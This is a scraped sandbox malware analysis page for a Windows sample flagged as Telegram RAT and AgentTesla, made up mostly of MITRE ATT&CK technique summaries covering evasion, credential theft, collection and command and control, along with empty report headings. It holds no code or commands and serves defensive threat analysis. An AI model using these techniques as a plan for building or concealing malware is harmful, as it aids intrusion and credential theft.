Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware2.17994.22795

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Static AutoIT Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 0046F5D0, Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630
windowkeyboardnativeCOMMONCrypto

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre